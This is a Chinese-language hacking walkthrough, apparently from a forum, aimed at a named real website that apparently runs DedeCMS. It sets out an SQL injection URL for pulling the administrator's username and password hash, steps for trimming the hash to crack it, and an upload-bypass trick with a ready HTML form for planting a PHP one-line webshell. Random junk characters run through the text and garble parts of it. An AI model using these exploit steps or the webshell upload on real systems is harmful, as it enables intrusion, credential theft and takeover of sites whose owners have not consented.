①注入漏洞。
8 a, B C4 _, _ h/ a这站 http://www.political-security.com/! z7 L1 Z6 A) C- `4 |* R
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
6 H7 O2 Z7 j; @& O2 ^. swww.political-security.com/data/mysql_error_trace.inc 爆后台
( L. l" x: f# j; l然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。1 C5 r7 v9 m( `! o' k
然后写上语句 6 D( ^& b F7 G+ d7 M2 C. w
查看管理员帐号
8 a4 H, {0 ]4 U4 @5 ]# P5 [" Ghttp://www.political-security.co ... &membergroup=@`4 G) L, y7 _/ f7 [, B* z6 T5 c1 `
$ n1 P# A& }! w |4 k4 i3 D5 ~
admin
$ D4 \ a, O& }6 {6 a8 x2 r9 Y0 X* k1 ?
查看管理员密码
s* d7 |) i0 p2 w2 z. L http://www.political-security.co ... &membergroup=@`
( {( Z/ a- T$ \2 x5 \% k [+ c3 m
% J H* s/ p9 m+ b$ K8 i8d29b1ef9f8c5a5af429" L- C" O& s! g
* ^( K, [( k- i/ W查看管理员密码
& b9 ^; H; Y* }. V4 _# n, f; F
2 f; u0 T9 ~' l {得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5# U# w8 j1 `) n" F% L
0 p* ]; x) U3 G7 W9 R" J2 }
8d2) k F& d4 h% L {$ [
9b1ef9f8c5a5af42
$ Y, m2 N2 z; v; x9
! V6 S" \) { r/ k+ M+ U% x4 Q; f
cmd5没解出来 只好测试第二个方法
8 ~/ x: ]$ A2 Z
+ [7 h+ Y7 a3 O; \0 G- B& N& p
②上传漏洞:
3 u. n. d( I! \: i* p( E: ]' F: n) b9 ^( o& Y" x6 K
只要登陆会员中心,然后访问页面链接
" k$ r+ p/ W C1 o; N“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”2 J. o+ D; e+ d/ a& Q5 U
" N+ H' @3 z4 j, @1 p- t
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
4 |# d7 D2 f) H6 z0 _& O" ~% Q7 v5 t! Y) v
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
1 F! a8 d6 C; ~4 G3 o' ~0 v9 c N4 F& F
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>, u5 ?" [ [- L
或者
' O; d1 U8 W) e {& |即可上传成功 |